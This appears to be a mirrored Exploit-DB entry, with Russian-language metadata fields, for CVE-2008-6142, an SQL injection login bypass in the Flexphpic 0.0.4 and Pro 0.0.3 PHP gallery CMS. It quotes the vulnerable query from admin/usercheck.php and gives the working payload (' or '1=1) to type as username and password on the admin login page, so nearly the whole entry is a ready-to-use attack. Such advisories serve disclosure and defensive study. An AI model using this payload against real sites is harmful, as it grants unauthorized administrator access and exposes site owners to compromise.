- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7624
- Проверка EDB
-
- Пройдено
- Автор
- S.W.A.T.
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6142
- Дата публикации
- 2008-12-30
Код:
#############################################
Autore: S.W.A.T.
Email: [email protected]
Site: Www.BaTLaGH.coM
Cms: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Download: http://www.china-on-site.com/flexphpic/downloads.php
##############################################
Bug In \admin\usercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
I'll Be A C I D A L !!!
# milw0rm.com [2008-12-30]
- Источник
- www.exploit-db.com